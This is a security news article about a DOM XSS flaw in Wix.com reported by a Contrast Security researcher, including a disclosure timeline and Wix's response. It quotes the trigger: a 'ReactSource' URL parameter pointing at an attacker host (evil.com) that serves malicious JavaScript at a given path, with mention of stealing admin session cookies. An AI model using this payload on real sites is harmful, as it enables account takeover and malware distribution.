Home > Cyber News > XSS Bug Found on Wix.com Platform, Built on Open-Source WordPress Library

XSS Bug Found on Wix.com Platform, Built on Open-Source WordPress Library


Have you heard of wix(.)com?

Wix.com is a cloud-based web development platform designed for users to build HTML5 web sites and mobile sites through the use of the company’s online drag and drop tools.

Unfortunately, a serious XSS bug has been discovered on the platform currently endangering millions of websites and users.

Related: TeslaCrypt Spread via Compromised WordPress Pages

Wix(.)com has a serious XSS bug, researcher says

As reported by security researchers, the service hosts millions of websites with 87 million registered users. The scary part is that all users are currently prone to this XSS vulnerability. The latter can be deployed by attackers in a worm-like manner to take over administrator accounts. Once this is done, the attackers obtain full control over the compromised websites.

The XSS vulnerability was disclosed by Matt Austin from Contrast Security. He wrote:

Wix.com has a severe DOM XSS vulnerability that allows an attacker complete control over any website hosted at Wix. Simply by adding a single parameter to any site created on Wix, the attacker can cause their JavaScript to be loaded and run as part of the target website.

A simple line of code is enough to trigger the bug

The attack can be triggered only by adding a simple redirection command to any URL from wix(.)com. The result is being redirected to malicious JavaScrip. See an example below:

  • Add: ?ReactSource=https://evil.com to any URL for any site created on wix.com.
  • Make sure evil.com hosts a malicious file at /packages-bin/wixCodeInit/wixCodeInit.min.js

These simple lines of codes are enough for the attackers to be sure that their JS is loaded and activated as part of the targeted website, the researcher explains. Attackers are also able to gain access to admin session cookies and resources, a very bad scenario indeed. Whenever a session cookie is harvested, attackers can freely position the DOM XSS in an iframe. This is done to host malicious content on any website administered by an operator.

Upon success, this attack can be leveraged for malware distribution, website modification, cryptocurrency mining, altering account credentials, etc.

What did Wix say?

As for the communication with wix(.)com, the researcher shares the following experience:

Oct 10: Creates Support ticket requesting security contact
Oct 11: Reach out to @wix on twitter to find a security contact. Replied to use standard support. Gave details in created ticket. Ticket page no longer works. https://www.wix.com/support/html5/contact.
Oct 14: Received standard “We are investigating the matter and will follow up as soon as possible” reply from Wix.
Oct 20: Reply to ticket requesting an update. (no response)
Oct 27: Second request for an update. (no response)

On October 28, the researcher finally received a respond which stated that the

group you tried to contact (security) may not exist, or you may not have permission to post messages to the group.

Nonetheless, the CEO of Wix Avishai Abrahami eventually admitted that certain aspects of the platform are based on the WordPress open-source library. He claims that whatever was improved upon was released back to the community, ZDNet reports.

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum since the project started. A professional with 10+ years of experience in creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim

More Posts

Follow Me:

Leave a Comment

Your email address will not be published. Required fields are marked *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our Privacy Policy.
I Agree